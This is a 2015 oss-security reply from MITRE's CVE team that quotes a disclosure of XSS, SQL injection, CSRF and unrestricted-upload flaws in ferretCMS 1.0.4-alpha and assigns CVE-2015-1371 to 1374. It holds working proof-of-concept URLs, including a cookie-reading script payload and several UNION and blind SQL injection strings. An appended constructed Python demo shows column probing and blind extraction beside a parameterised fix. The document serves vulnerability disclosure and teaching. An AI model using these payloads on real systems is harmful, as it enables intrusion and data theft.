Message-ID: <Pine.LNX.4.64.1501271034400.11165@beijing.mitre.org>
Date: Tue, 27 Jan 2015 10:37:48 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload


> I found multiple reflected/stored XSS and SQLi vulnerabilities as well as
> an unrestricted file upload in the CMS ferretCMS v.1.0.4, which is currently
> in the alpha development stage.
>
> ============
> Reflected XSS
> ============
>
> http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
>
> ============
> Stored XSS
> ============
>
> 1.
> via login-form of the administrative backend, input field for username:
>
> http://{TARGET}/admin.php
>
> executed here in the logevent functionality in the backend:
>
> http://{TARGET}/admin.php?type=log&action=read
>
> 2.
>
> via the new blog-post form, input field for pagetitle:
>
> http://{TARGET}/admin.php?type=page&action=insert&p=
>
> executed, for example, here:
>
> http://{TARGET}/admin.php?type=page&action=read


Use CVE-2015-1373.


> ============
> SQLi
> ============
>
> http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
>
> http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
>
> http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
>
> http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
>
> http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

Use CVE-2015-1372.

> ==================
> Unrestricted file upload
> ==================
>
> An administrator has the opportunity to upload arbitrary files via a form
> located here on a common ferretCMS installation:
>
> http://{TARGET}/admin.php?type=uploader&action=upload
>
> As these files are not renamed and are stored in the following location, any
> unauthenticated user is able to read/execute those files, too:
>
> http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}

Use CVE-2015-1371.


Use CVE-2015-1374 for the underlying CSRF that makes the XSS, SQLi, and 
file-upload attacks accessible to non-administrators.

> Could you please assign a CVE-ID / CVE-IDs for these issues.
>
> Thank you very much!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] https://github.com/JRogaishio/ferretCMS
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
> [3] https://github.com/JRogaishio/ferretCMS/issues/63
> [4] https://github.com/sroesemann/ferretCMS
> [5] http://seclists.org/fulldisclosure/2015/Jan/98
> [6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
>

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
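Added illustration of the SQLi pattern the request lists (CVE-2015-1372): the seven URLs are all of the form `p=1 and 1=2 union select <n columns> -- `, with a different column count per `type`, plus one boolean-blind variant. The code below is not ferretCMS code and not from the advisory; it is a constructed Python/SQLite stand-in with a hypothetical four-column `site` table and hypothetical handler names (`lookup_site_vulnerable`, `lookup_site_fixed`), showing how the column count is probed, how the union payload pulls `sqlite_version()` (SQLite's spelling of MySQL's `version()`) into the result, how the blind payload works, and why binding `p` as an integer parameter shuts all of it down.

```python
import sqlite3

# Library version string, exposed so callers can check what the payload returns.
SQLITE_VERSION = sqlite3.sqlite_version


def make_db():
    """Constructed four-column table so the advisory's payload shape
    ("union select 1,version(),3,4") lines up. Not ferretCMS's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE site (id INTEGER PRIMARY KEY, name TEXT, url TEXT, notes TEXT)"
    )
    conn.execute("INSERT INTO site VALUES (1, 'main', 'http://site.example', 'n/a')")
    conn.commit()
    return conn


def lookup_site_vulnerable(conn, p):
    """Hypothetical vulnerable handler: the p parameter is spliced into SQL."""
    sql = "SELECT id, name, url, notes FROM site WHERE id = " + p
    return conn.execute(sql).fetchall()


def lookup_site_fixed(conn, p):
    """Hardened handler: p must be a decimal id and is bound as a parameter."""
    if not p.isdigit():
        raise ValueError("p must be a numeric id")
    sql = "SELECT id, name, url, notes FROM site WHERE id = ?"
    return conn.execute(sql, (int(p),)).fetchall()


def fixed_rejects(conn, p):
    """True if the hardened handler refuses p outright."""
    try:
        lookup_site_fixed(conn, p)
    except ValueError:
        return True
    return False


# Same shape as the advisory's type=site payload; sqlite_version() stands in
# for MySQL's version().
UNION_PAYLOAD = "1 and 1=2 union select 1,sqlite_version(),3,4 -- "


def probe_column_count(conn, max_cols=12):
    """How the 4/5/9 column counts in the advisory are found: grow a NULL list
    until the UNION stops raising a column-count mismatch."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            lookup_site_vulnerable(conn, "1 and 1=2 union select %s -- " % nulls)
        except sqlite3.OperationalError:
            continue
        return n
    return None


def version_first_char_is(conn, ch):
    """Boolean-blind variant of the last advisory payload
    (substring(version(),1,1)=5): the row comes back only on a correct guess."""
    p = "1 and substr(sqlite_version(),1,1)='%s' -- " % ch
    return len(lookup_site_vulnerable(conn, p)) == 1


if __name__ == "__main__":
    db = make_db()
    print("columns:", probe_column_count(db))
    print("union:", lookup_site_vulnerable(db, UNION_PAYLOAD))
    print("blind '3':", version_first_char_is(db, "3"))
    print("fixed, p=1:", lookup_site_fixed(db, "1"))
    print("fixed rejects payload:", fixed_rejects(db, UNION_PAYLOAD))
```

The `1 and 1=2` prefix empties the legitimate half of the UNION so only the attacker-chosen row is returned; the column count has to match the real query, which is why the advisory's `account` payload carries nine values and `template` five. Validating `p` as an integer before binding it is the fix that matters here; parameter binding alone would also defeat these payloads, but the allow-list makes the intent explicit and fails loudly.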
